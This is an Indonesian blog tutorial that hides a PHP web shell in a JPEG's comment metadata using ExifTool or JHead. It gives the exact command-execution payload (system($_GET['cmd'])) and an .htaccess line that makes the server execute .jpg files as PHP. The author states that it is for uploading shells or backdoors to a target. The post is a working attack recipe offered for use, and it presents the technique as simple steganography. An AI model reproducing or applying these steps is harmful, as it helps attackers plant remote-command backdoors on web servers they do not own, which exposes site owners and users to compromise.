Insert Script File PHP with ExifTool And Jhead

Post a Comment
Hallo sobat pixel sudah lama nggak update, kali ini gue mau bagiin gimana sih caranya memasukan file script php di gambar, lah emang bisa kak? ya bisa lah hehe. Buat kalian yang nggak tau trik ini dinamakan Steganografi, sedikit penjalasan Steganografi adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia. Nah loh berarti bisa selain script dong ya kak? yaiyalah hehe tapi ditutorial kali ini saya ingin memasukan file script php di gambar. Lanjut aja gimana sih caranya disini saya menggunakan JHEAD dan ExifTool kalian bisa pilih sesuai mood kalian aja ya hehe.

Bahan yang kalian butuhkan:

- JHead
sudo apt-get install jhead // for install Jhead
- ExifTool
sudo apt-get libimage-exiftool-perl // for install ExifTool
- File image jpeg, png or whatever.

Jika sudah kalian install, Kalian siapkan gambar yang ingin kalian masukan file script php.
Contoh saya sudah ada gambar yang ingin saya memasukan file script php, cakep bukan cewena hehe

Selanjutnya kalian memasukan file script php kedalam gambar :

ExifTool
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' nama-file.jpg
Jika sukses maka seperti ini, dan kita lihat ada comment script php sudah masuk berarti sudah masuk di dalam gambar.

JHead
jhead -ce nama-file.jpeg

Maka akan muncul tampilan editor vim disana, Kalian tinggal memasukan comment yang sama seperti sebelumnya

Jika sukses maka akan seperti ini dan jika sudah kalian memasukan file script php kalian cukup tekan :wq untuk keluar.

Jika sukses maka seperti ini, dan kita lihat ada comment script php sudah masuk berarti sudah masuk di dalam gambar.

Nb: Oiya trik ini bisa kalian gunakan jika kalian upload shell or backdoor, but jika kalian ingin memasukan file script gambar ini ke dalam target kalian, kalian jangan lupa yang sama tambahkan .htaccess dengan isi :

AddType application/x-httpd-php .jpg

Ini ditujukan agar sript php didalamnya tetap terbaca meski ekstensi file nya bukan php.

Gimana cukup mudah bukan? Oke mungkin cukup sekian, Semoga bermanfaat and dont forget to share and see you next time byee~

Reference : https://exploit.linuxsec.org/menyisipkan-file-backdoor-php-ke-jpg/

Related Posts

Post a Comment

Subscribe Our Newsletter